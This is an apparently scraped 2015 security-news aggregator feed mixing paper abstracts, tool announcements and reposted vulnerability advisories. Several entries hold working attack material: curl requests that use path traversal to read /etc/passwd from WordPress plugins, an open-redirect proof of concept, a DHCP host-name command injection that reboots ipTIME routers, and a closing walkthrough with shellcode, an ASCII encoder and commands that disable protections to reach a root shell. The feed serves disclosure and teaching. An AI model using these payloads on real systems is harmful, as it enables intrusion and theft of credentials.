Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Paper: HTML5 Battery Status API enables websites to access the battery state of a mobile device or a laptop

July 4, 2015, 9:50 am
$
0
0
Abstract
We highlight the privacy risks associated with the HTML5 Battery Status API. We put special focus on its implementation in the Firefox browser. Our study shows that websites can discover the capacity of users’ batteries by exploiting the high precision readouts provided by Firefox on Linux. The capacity of the battery, as well as its level, expose a fingerprintable surface that can be used to track web users in short time intervals. Our analysis shows that the risk is much higher for old or used batteries with reduced capacities, as the battery capacity may potentially serve as a tracking identifier. The fingerprintable surface of the API could be drastically reduced without any loss in the API’s functionality by reducing the precision of the readings. We propose minor modifications to Battery Status API and its implementation in the Firefox browser to address the privacy issues presented in the study. Our bug report for Firefox was accepted and a fix is deployed

more here..............http://eprint.iacr.org/2015/616.pdf


Source Image: mozilla.org



Search

LFI Vulnerability in Wordpress Plugin mdc-youtube-downloader v2.1.0

July 4, 2015, 12:52 pm
$
0
0
Title: LFI in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01
Vendor Contact: n.mukto@gmail.com
Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site.

Vulnerability:
The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system allowing sensitive files to be
downloaded:

$file_name = $_GET['file'];

// make sure it's a file before doing anything!
if(is_file($file_name)) {
.
.
.
 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
                case 'pdf': $mime = 'application/pdf'; break;
                case 'zip': $mime = 'application/zip'; break;
                case 'jpeg':
                case 'jpg': $mime = 'image/jpg'; break;
                default: $mime = 'application/force-download';
        }
        header('Pragma: public');       // required
        header('Expires: 0');           // no cache
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
        header('Cache-Control: private',false);
        header('Content-Type: '.$mime);
        header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
        header('Content-Transfer-Encoding: binary');
        header('Content-Length: '.filesize($file_name));        // provide file size
        header('Connection: close');
        readfile($file_name);           // push it out
        exit();

CVEID:
OSVDB:

Exploit Code:
$ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd







Thanos- Banner Grabber v1.0.0 beta

July 4, 2015, 5:04 pm
$
0
0
Thanos is a tool made for scanning any range of IP's and getting the banners of the running services. The main function is a banner grabber, but you also can use this for exploit vulnerabilities, find proxy servers, or simply check for open ports.

Compile:

You need sqlite3 and pthreads.

$ git clone https://github.com/P0cL4bs/Thanos.git
$ cd Thanos
$ make

Using Thanos

Before starting scan, you must create a new database file, you can do it following the example:

$ ./thanos --new-db banner_grabber.db

_____  _      __    _      ___   __
 | |  | |_|  / /\  | |\ | / / \ ( (`
 |_|  |_| | /_/--\ |_| \| \_\_/ _)_)

        Banner Grabber v1.0.0 beta


[+] Creating new database file: banner_grabber.db
[+] Ok
[+] Creating table
[+] Executing query:

create table thanos_scan (
        id INTEGER PRIMARY KEY,
        port INTEGER NOT NULL,
        data TEXT,
        timeout INTEGER,
        limit_download INTEGER
);

[+] Ok
A new database file will be create, now you must insert new scanners configurations on database:

$ echo -e "QUIT\n" > /tmp/ftp_scan
$ ./thanos --cfg-db banner_grabber.db \
 --cfg-port 21 \
 --cfg-file /tmp/ftp_scan \
 --cfg-timeout 10
 --cfg-limit 300

[...]

[+] Inserting new options to database file
[+] Ok
A new type of scan was insert on database, will scan the port 21, if it is open, will send the data of file /tmp/ftp_scan for the port, and wait for 10 seconds, or until the cfg-limit be reached, or when the server close the connection.

We can list the scanners in database using the option --list:

$ ./thanos --cfg-db banner_grabber.db --list

[...]

[+] Starting listing rows in database file

[+] ID: 1
[+] Port: 21
[+] Data: 515549540a0a
[+] Timeout: 10
[+] Limit Download: 300

[+] Finish
ID = Scanner ID

Port = Port to check

Data = Content to send

Timeout = Max time of seconds to wait

Limit Download = Max size of bytes to reached

if you want insert a new scanner, the option --cfg-port is required, if --cfg-file not be set so the value will be NULL, if --cfg-timeout not be set the value used will be the macro DEFAULT_TIMEOUT, if --cfg-limit not be set the value used will be the macro DEFAULT_LIMIT_BYTES.

Doing the Scan:

$ ./thanos --cfg-db banner_grabber.db -s 0 -e 0

[...]

Number of scans load: 1
Total IP's to scan: 1

[+] 0.0.0.0:21 open

CHEWB FTP SERVER

-s | --start = IP address to start

-e | --end = IP address to end

IP address samples:

1 = 1.0.0.0

1.2 = 1.2.0.0

1.2.3 = 1.2.3.0

you can configure the banner output, using -n (--no-wide) or -D (--hex-dump).

Changing the configuration file:

You can edit the parameters of the configuration file , setting the option --update-id, example:

$ ./thanos --cfg-db banner_grabber.db --update-id 1 --cfg-data /dev/null
Change the Data value.

You can also delete scanners configurations, using --delete-id, example:

$ ./thanos --cfg-db banner_grabber.db --delete-id 1

more here..............https://github.com/P0cL4bs/Thanos



Source Image: geekblogtv

System level Access and Plain Text Passwords using Bypass UAC and Mimikatz

July 4, 2015, 11:34 pm
$
0
0
If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to the all powerful System level access. The problem is it doesn’t seem to work anymore – so let’s see what changed and get some plain text passwords while we are at it!

Its been a while since I have used Metasploit’s Bypass UAC module and when I went to use it recently, it kept erroring out. Once you had a remote shell with Metasploit all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple, the module usage has changed slightly.

We will start with an active session to a Windows 7 system here...........https://cyberarms.wordpress.com/2015/07/04/system-level-access-and-plain-text-passwords-using-bypass-uac-and-mimikatz/



Emulating Linux MIPS in Perl - Part 1: ELF loader, Part 2: Linux emulation, Part 3: MIPS CPU emulation & Part 4: Bits and Ends and Links

July 5, 2015, 7:14 am
$
0
0
The real reason why I wanted a blog is to be able to talk about interesting things, and sometimes to publish or write about stuff I did that might be interesting to others, but  and that wouldn't warrant making a formal release of some software package.

So, today I'll write about a MIPS CPU emulator that emulates just enough of a Linux kernel and enough of an ELF loader to be able to run some statically linked programs.

Uhm, why would one do that, and why in Perl?

To run dash or bash, i.e., some POSIX shell.

Uhm, and why would one want to do that?

Well, to run perl's Configure script of course!

Uhm, and why not use bash directly?

Ah, to run Configure on native windows, to see if staticperl could be made to work with it.

This is quite succinctly the trail of thought that led to this silly project, in reverse order. It was a bit more complicated in proper order

more here where  you can access all 4 parts of the emulating MIPS in Perl articles.............http://schplog.schmorp.de/2015-06-08-emulating-linux-mips-in-perl-1.html







White Paper: AWS Best Practices for DDoS Resiliency

July 5, 2015, 7:22 am
$
0
0
Abstract 
This paper is intended for customers who want to improve resiliency of their applications running on Amazon Web Services (AWS) against Distributed Denial of Service attacks. The paper provides an overview of Distributed Denial of Service attacks, techniques that can help maintain availability, and reference architectures to provide architectural guidance with the goal of improving your resiliency. The paper is targeted at IT decision makers and security personnel who are familiar with basic concepts in the area of networking, security, and AWS. Each section has links to AWS documentation with specific information on how to perform the tasks listed.

more here..................http://d0.awsstatic.com/whitepapers/DDoS_White_Paper_June2015.pdf




SpearPhisher

July 5, 2015, 2:54 pm
$
0
0
A Web Application to Send and Track Spear Phishing Campaigns.

You can view screenshots and a quick demo video at http://spearphisher.co.uk

SpearPhisher is made up of 3 components.

Django Web Application for Creation and Management.
SMTP Server for sending Emails.
Bottle Web Application for Tracking Responses.

SpearPhisher makes use of the following 3rd-Party components:

jQuery - https://code.jquery.com/
BootStrap - http://getbootstrap.com/
BootStrap Tables - http://bootstrap-table.wenzhixin.net.cn/
SummerNote - http://summernote.org/
FontAwsome - https://fortawesome.github.io/Font-Awesome/
HighCharts - http://www.highcharts.com/

more here....................https://github.com/kevthehermit/SpearPhisher











Identifying and exploiting rom-0 vulnerabilities

July 5, 2015, 10:40 am
$
0
0
I will talk about simple, but dangerous vulnerability present on many network devices which are using RomPager Embedded Web Server. Attacker is able to get your ISP password, wireless password and other sensitive information by issuing single HTTP GET request to ‘/rom-0′ URI. Mentioned information disclosure is present in RomPager Embedded Web Server. Affected devices include ZTE, TP-Link, ZynOS, Huawei and many others. Vulnerability was published in 2014 (by looking at CVE), but I see lot of people don’t know about it: mainly because there was no hype about it and most of the popular vulnerability scanners failed in identifying it.

I still think that vulnerability is pretty dangerous: if administration web interface of router is exposed on Internet – that means that anyone on Internet is able to know your ISP password, wireless password and router password by single unauthorized http request. But attacker does not have to stop there – since it knows your router password, attacker can change router settings and redirect your network traffic as he likes (by changing route or DNS settings). Attacker can also expose your LAN to Internet or access your internal services or computers by abusing port forwarding features. So, I hope this vulnerability will get better treatment after this blog post and NSE script.

more here...............https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/



Search

Intel Assembler 80x86 CodeTable Cheat Sheet

July 5, 2015, 10:45 am
$
0
0
When I made my first steps coding in the programming language Intel Assembly x86 I was looking for a compact list containing all instructions. Because I couldn't find any I created my own cheat sheet:

- includes most instructions (transfer, arithmetic, logic, jumps, ...)
- includes a diagram of the registers (EAX, EDX, ECX, EBX) and flags
- includes source code of a demo program
- handy Quick Reference fits on one single sheet (front & back)

more here....................http://www.jegerlehner.ch/intel/



KINS (or ZeusVM) v2.0.0.0 tookit (builder & panel source code) leaked- sells for 5K on black market

July 5, 2015, 10:51 am
$
0
0
KINS (or ZeusVM to be precised) v2.0.0.0 tookit (builder & panel) was leaked and spread all over the internet. On Jun 26th 2015 we were informed (thank you Xylit0l) about this and after several internal discussion, considering that: "so many more of bad guys know about this than good guys" today we decided to raise warning about this matter by this post. So this is an information to those who may not know about the leaked package yet and/or want to have the archive of what has leaked from the trusted source.

Together with this warning also we would like to inform that KINS version 3 is on the black market now with the price of 5k according to a certain crook's affiliated forum.

This is a team work, two friends Xylit0l [link] and unixfreaxjp [link] are on the case building this report, testing, recording, screenshots, takedown sites who spread the leaked packages as much as possible,.

What was leaked exactly?

more here.............http://blog.malwaremustdie.org/2015/07/mmd-0036-2015-kins-or-zeusvm-v2000.html




Open redirect vulnerability in StageShow Wordpress plugin v5.0.8

July 5, 2015, 12:42 pm
$
0
0
# Title: Open redirect vulnerability in StageShow Wordpress plugin v5.0.8
# Submitter: Nitin Venkatesh
# Product: StageShow Wordpress Plugin
# Product URL: https://wordpress.org/plugins/stageshow
# Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
# Affected Versions: v5.0.8 and possibly below
# Tested Version: v5.0.8
# Fixed Version: v5.0.9
# Link to source code diff:
https://plugins.trac.wordpress.org/changeset/1165310
# Link to changelog: https://wordpress.org/plugins/stageshow/changelog/
# CVE Status: None/Unassigned/Fresh

## Product Information

StageShow adds the facility for an online Box-Office for Small
Theatres/Drama Groups, records sales, validates tickets and provides sales
downloads.

## Vulnerability Description

Open redirect vulnerability in stageshow_redirect.php file using url
parameter

## Vulnerable Source Code

31 $url = urldecode($_GET['url']);
..
34 Redirect($url, true);
35
36 function Redirect($url, $permanent = false)
37 {
38    header('Location: ' . $url, true, $permanent ? 301 : 302);
39    die;
40 }

## Proof of Concept

Sample exploit GET request:

GET
/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2F2buntu.com

## Solution:

Upgrade to v5.0.9

## Disclosure Timeline:

2015-05-19 - Discovered. Contacted developer on forums
2015-05-20 - Report mailed to developer
2015-05-21 - Update v5.0.9 released
2015-07-05 Publishing disclosure


## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.






Redis Sniffer v1.1.0- A Redis event sniffer and logging utility

July 5, 2015, 12:50 pm
$
0
0
This tool will monitor a specific port and interface for redis traffic and captures the commands being sent to Redis and/or formatted full TCP dump data. This can be used for analysis for debugging or for replaying the transactions as a way of doing real load/performance testing.

Redis Hound must be run locally on a Redis server or a server that is sending commands to Redis.

more here....................https://github.com/jplesperance/redis-sniffer




A fileless Ursnif doing some POS focused reco

July 5, 2015, 1:24 pm
$
0
0
At begining of June, I noticed a "different" Angler pass.
No drop and Ursnif (multifacited malware) call backs.

FileLess Angler Pass and Ursnif Callback


I already encountered that "small ursnif" multiple time. In november for instance some 18k sample pushed in Bedep 380278c243a03c70dba89af2e6d4916f (grabbing a sample doing some IAP like callback - 43fce12aace6e73fc7b1e1117595816e )

more here..................http://malware.dontneedcoffee.com/2015/07/a-fileless-ursnif-doing-some-pos.html

Remote File Download Vulnerability in Wordpress Plugin wp-ecommerce-shop-styling v2.5

July 5, 2015, 2:51 pm
$
0
0
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.

Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded.


1 <?php
2 require_once("../../../../wp-admin/admin.php");
3
4 header('Content-disposition: attachment; filename='.$_GET['filename']);
5 header('Content-type: application/pdf');
6 readfile(HAET_INVOICE_PATH.$_GET['filename']);
7 ?>

You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path.
CVEID:
OSVDB:
Exploit Code:
$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd




node-thin

July 5, 2015, 5:39 pm
$
0
0
node-thin is a HTTP/HTTPS debugging proxy which allows to use collection of middlewares/interceptors in order to trace/pre-process/post-process requests and resposes. The proxy in HTTPS mode actually allows simulate the man-in-the-middle (mitm) attack or traffic hijacking. Concept of middlewares is similar to connect (expressjs) frameworks.

more here.....................https://github.com/runk/node-thin



Search

Important security upgrades for node.js and io.js

July 5, 2015, 5:59 pm
$
0
0
Critical security releases for node.js and io.js

node.js-v0.12.6
io.js-v2.3.3
io.js-v1.8.3
First, the obvious: the handling of this hasn’t been ideal, it would have been nice to take our time and do this more strategically. It’s evening in the USA and it’s the weekend of the 4th of July.

We made the call to push forward because details about the bug and potential exploit has inadvertently made its way to a public forum so we’d rather given companies and users the tools to protect themselves and mitigate DoS if they happen to become a reality than sit on it and cross our fingers. The timing sucks, particularly for the USA where it’s hitting the weekend and the whole 4th of July thing makes this a nightmare for people managing large deployments but this is the call we made with the information available.

more here................https://medium.com/@iojs/important-security-upgrades-for-node-js-and-io-js-8ac14ece5852

and here..............https://github.com/nodejs/io.js/blob/master/CHANGELOG.md


Source Image. node.js.org

127 ipTIME router models vulnerable to an unauthenticated RCE by sending a crafted DHCP request

July 5, 2015, 7:11 pm
$
0
0
## Advisory Information

Title: 127 ipTIME router models vulnerable to an unauthenticated RCE
by sending a crafted DHCP request
Advisory URL: https://pierrekim.github.io/advisories/2015-iptime-0x02.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-06-127-iptime-router-models-unauthenticated-RCE-with-DHCP.html
Date Published: 2015-07-06
Vendors contacted: None
Release mode: Released 0Day
Release mode: Released, 0day
CVE: None



## Product Description

EFMNetworks ipTIME is the largest Korean brand of SOHO/small/middle
entreprise Routers/WiFi APs/Modems/Firewalls in South Korea
with millions of devices deployed in the country. EFMNetworks ipTIME
is occupying more than 60 percent of personal network devices.
There are =~ 10 000 000 of ipTIME devices deployed in South Korea.



## Vulnerability Summary

This vulnerability allows to bypass the admin authentication and to
get a direct RCE from the LAN side with a single DHCP request.

This is a direct RCE against the routers which gives a complete root
access to the embedded Linux from the LAN side.

It affects 127 ipTIME products from 2009-era firmwares to the current
firwmare (9.66, built time 2015-06-11) with the default configuration:


  - ipTIME a1004
  - ipTIME a1004v
  - ipTIME a104
  - ipTIME a104ns
  - ipTIME a104r
  - ipTIME a2004
  - ipTIME a2004ns
  - ipTIME a2004r
  - ipTIME a2008
  - ipTIME a3004
  - ipTIME a3004ns
  - ipTIME a5004ns
  - ipTIME a604
  - ipTIME a604v
  - ipTIME extac
  - ipTIME extd2
  - ipTIME g1
  - ipTIME g104
  - ipTIME g104a
  - ipTIME g104be
  - ipTIME g104i
  - ipTIME g104m
  - ipTIME g204
  - ipTIME g501
  - ipTIME g504
  - ipTIME ipsmart
  - ipTIME mini
  - ipTIME mobap1
  - ipTIME multi
  - ipTIME n1
  - ipTIME n104
  - ipTIME n104a
  - ipTIME n104ar1
  - ipTIME n104i
  - ipTIME n104k
  - ipTIME n104ktt
  - ipTIME n104m
  - ipTIME n104p
  - ipTIME n104q
  - ipTIME n104r
  - ipTIME n104r3
  - ipTIME n104rsk
  - ipTIME n104s
  - ipTIME n104sr1
  - ipTIME n104t
  - ipTIME n104v
  - ipTIME n104vlg
  - ipTIME n1e
  - ipTIME n1eky
  - ipTIME n1p
  - ipTIME n2
  - ipTIME n2e
  - ipTIME n2p
  - ipTIME n3004
  - ipTIME n5
  - ipTIME n5004
  - ipTIME n504
  - ipTIME n5r1
  - ipTIME n6004
  - ipTIME n6004m
  - ipTIME n6004r
  - ipTIME n604
  - ipTIME n604a
  - ipTIME n604i
  - ipTIME n604m
  - ipTIME n604p
  - ipTIME n604r
  - ipTIME n604s
  - ipTIME n604t
  - ipTIME n604v
  - ipTIME n604vlg
  - ipTIME n608
  - ipTIME n7004ns
  - ipTIME n702bcm
  - ipTIME n704
  - ipTIME n704a
  - ipTIME n704a3
  - ipTIME n704bcm
  - ipTIME n704lg
  - ipTIME n704m
  - ipTIME n704mlg
  - ipTIME n704ns
  - ipTIME n704s
  - ipTIME n704v
  - ipTIME n704v3
  - ipTIME n8004
  - ipTIME n8004r
  - ipTIME n8004v
  - ipTIME n804
  - ipTIME n804a
  - ipTIME n804a3
  - ipTIME n804t
  - ipTIME n804t3
  - ipTIME n804v
  - ipTIME n904
  - ipTIME n904ns
  - ipTIME n904v
  - ipTIME ng104
  - ipTIME ng304
  - ipTIME ntq104
  - ipTIME ntv108
  - ipTIME ntv116
  - ipTIME ntv124
  - ipTIME q1
  - ipTIME q304
  - ipTIME q504
  - ipTIME q604
  - ipTIME t1004
  - ipTIME t1008
  - ipTIME t16000
  - ipTIME t2008
  - ipTIME t24000
  - ipTIME t3004
  - ipTIME t3008
  - ipTIME timeve
  - ipTIME tq204
  - ipTIME tv104
  - ipTIME v1016
  - ipTIME v1024
  - ipTIME v304
  - ipTIME v308
  - ipTIME v504
  - ipTIME wre1
  - ipTIME x3003
  - ipTIME x3007
  - ipTIME x5007
  - ipTIME x6003


The probability that firmware 9.68 (last firmware for these specific
models) running in the below products is vulnerable is VERY high:


  - ipTIME q304
  - ipTIME q1
  - ipTIME q504
  - ipTIME ew302
  - ipTIME n702bcm
  - ipTIME a3004ns
  - ipTIME a5004ns


Concerning the high CVSS score (10/10) of the vulnerability, the
number of affected devices and the longevity of this vulnerability (6+
year old),
the ipTIME users are urged to contact ipTIME.



## Details

This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD
server in ipTIME devices allows remote attackers to execute arbitrary
commands
via shell metacharacters in the host-name field.

Sending a DHCP request with this parameter will reboot the device:

cat /etc/dhcp/dhclient.conf

  send host-name ";/sbin/reboot";

When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we
will see the stdout of the /dev/console device;
the dhcp request will immediately force the reboot of the remote device:


Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

[...]
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).

Launch iwcontrol: wlan0
Reaped 317
iwcontrol RUN OK
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
WAN0 IP: 192.168.2.1
signalling START
Invalid upnpd exit
killall: upnpd: no process killed
upnpd Restart 1
iptables: Bad rule (does a matching rule exist in that chain?)
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
Update Session timestamp and try it after 5 seconds again.
ez_ipupdate callback --> time_elapsed: 0
Run DDNS by IP change:  / 192.168.2.1
Reaped 352
iptables: Bad rule (does a matching rule exist in that chain?)
Jan  1 00:00:25 miniupnpd[370]: Reloading rules from lease file
Jan  1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
Jan  1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
Reaped 363
Led Silent Callback
Turn ON All LED
Dynamic Channel Search for wlan0 is OFF
start_signal => plantynet_sync
Do start_signal => plantynet_sync
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
Reaped 354
iptables: Bad rule (does a matching rule exist in that chain?)
ez_ipupdate callback --> time_elapsed: 1
Run DDNS by IP change:  / 192.168.2.1
Burst DDNS Registration is denied: iptime -> now:26
Led Silent Callback
Turn ON All LED
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
- ---> Plantynet Event : 00000003
- ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE


[sending the DHCP request]


[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan  1
00:01:03 miniupnpd[370]: received signal 15, good-bye
Reaped 392
Reaped 318
Reaped 314
Reaped 290
Reaped 288
Reaped 268
Reaped 370
Reaped 367
- ---> PLANTYNET_SYNC_FREE_DEVICE
Restarting system.

Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Reboot Result from Watchdog Timeout!

- ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
Delay 1 second till reset button
Magic Number: raw_nv 00000000
Check Firmware(05020000) : size: 0x001ddfc8 ---->


[...]




An attacker can use the /usr/bin/wget binary located in the file
system of the remote device to plant a backdoor and then execute it as
root.

- From my tests, it is possible to use this vulnerability to overwrite
the firmware with a custom (backdoored) firmware.



## Vendor Response

- From my experience, contacting EFMNetworks ipTIME proved to be useless.
They don't publish security information in the changelog, they don't
answer to security researchers and
they don't credit them either.
EFMNetworks ipTIME was not contacted in regard of this case.



## Report Timeline

 * Jun 02, 2014: Vulnerability found by Pierre Kim.
 * Apr 07, 2015: Vulnerabilities confirmed with reliable PoCs.
 * Jun 25, 2015: Vulnerability confirmed on all the existing versions
from 2009 to 2015 including the last firmware version (9.66).
 * Jul 06, 2015: A public advisory is sent to security mailing lists.



## Credit

This vulnerability was found by Pierre Kim (@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2015-iptime-0x02.txt



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/



Working with base64 (Video Included)

July 5, 2015, 8:08 pm
$
0
0
Last week I received another malicious document with embedded payload encoded with base64. A bit tired of repeating the same manual operations to extract and decode base64 content, I quickly wrote a small Python script to help me.

more here..................https://isc.sans.edu/diary/Working+with+base64/19873





Ascii Shell Generator to bypass MSB data filters for buffer overflow exploits on Intel platforms

July 5, 2015, 11:34 pm
$
0
0
Buffer overflows aim to execute carefully chosen machine-native 
instructions on a target system. That code is a series of bytes
that cross the full range of possible values. Unfortunately for
many attackers, certain servers filter out or modify any values
outside the range 21 to 7F hex. Examples are web proxies and
e-mail servers that cannot handle non-printable ASCII values in
their data. Their input filters mangle the incoming exploit 
code, and as a result destroy its functionality.

I posed a challenge to several hackers one Saturday night, and
this paper is the result. The algorithm presented here will 
encode any sequence of binary data into ASCII characters that,
when interpereted by an Intel processor, will decode the 
original sequence and execute it.

More information about this technique on the Riley "caezar" Eller publication:
Compile the AsciiShellGen program:
$ make && make clean
Usage:
# ./AsciiShellGen
usage:  AsciiShellGen  <esp offset>  <nop sleed from loader to shellcode>  <shellcode in hexastring "\xOP\xOP"...>

Example with setuid(0) & execve(/bin/sh,0,0) shellcode:
# ./AsciiPolyEng -270 10  "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"
TX-KKKK-KKKK-xjiiP\00%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPP

Injection in vulnerable program in a buffer of 512 bytes:
#include <string.h>
#include <stdio.h>

int foo(char *str)
{
    char buffer[512];
    printf("[buffer addr] 0x%x: %s\n\n", &buffer, str);
    strcpy(buffer, str);
    return 0;
}


int main(int argc, char *argv[])
{
    if(argc != 2)
        exit(0);
    foo(argv[1]);
}

Compile the vulnerable program without security memory protections against the stack buffer overflow exploits:
#gcc -fno-pie -fno-stack-protector -z execstack -m32 -g vuln.c -o vuln
Set the program with the set-uid root bit:
#chown root:users vuln
#chmod u+s vuln 
#ls -l vuln
-rwsr-xr-x 1 root users 7068 Jul  6 02:37 vuln
Deactivate the ASLR:
#echo 0 > /proc/sys/kernel/randomize_va_space
Injecte the shellcode on the buffer and write the return address:
$./vuln "TX-KKKK-KKKK-xjiiP\00%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPP"$(perl -e 'print "\xd0\xd6\xff\xff"x80')

[buffer addr] 0xffffd6d0: TX-KKKK-KKKK-xjiiP\00%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPP��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
sh-4.3#whoami
root
The debugger view:
$gdb -q vuln
(gdb) l
32      char buffer[512];
33  
34      printf("[buffer addr] 0x%x %s\n", &buffer, str);
35  
36      strcpy(buffer, str);
37  
38      return 0;
39  }
40  
41  
(gdb) b 38
Breakpoint 1 at 0x8048493: file vuln.c, line 38.
(gdb)  r "TX-KKKK-KKKK-xjiiP\00%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPP"$(perl -e 'print "\x70\xd6\xff\xff"x80')

...

Breakpoint 1, foo (str=0xffffda00 "") at vuln.c:38
38      return 0;
(gdb) p &buffer
$1 = (char (*)[512]) 0xffffd670
(gdb) nexti
0x08048499  39  }
(gdb) nexti
0xffffd670 in ?? ()
(gdb) p $esp - $eip
$3 = 528
(gdb) x/60i $eip
=> 0xffffd670:  push   esp
   0xffffd671:  pop    eax
   0xffffd672:  sub    eax,0x4b4b4b4b
   0xffffd677:  sub    eax,0x4b4b4b4b
   0xffffd67c:  sub    eax,0x69696a78
   0xffffd681:  push   eax
   0xffffd682:  pop    esp
   0xffffd683:  and    eax,0x30303030
   0xffffd688:  and    eax,0x41414141
   0xffffd68d:  sub    eax,0x25252539
   0xffffd692:  sub    eax,0x4a4a4a47
   0xffffd697:  push   eax
   0xffffd698:  sub    eax,0x684e6868
   0xffffd69d:  sub    eax,0x25336874
   0xffffd6a2:  sub    eax,0x352d3651
   0xffffd6a7:  push   eax
   0xffffd6a8:  sub    eax,0x5a797979
   0xffffd6ad:  sub    eax,0x36795a79
   0xffffd6b2:  sub    eax,0x2d2d364c
   0xffffd6b7:  sub    eax,0x2d382d32
   0xffffd6bc:  push   eax
   0xffffd6bd:  sub    eax,0x644b4b37
   0xffffd6c2:  sub    eax,0x7a644b25
   0xffffd6c7:  sub    eax,0x7a6b5225
   0xffffd6cc:  push   eax
   0xffffd6cd:  sub    eax,0x78787878
   0xffffd6d2:  sub    eax,0x78474747
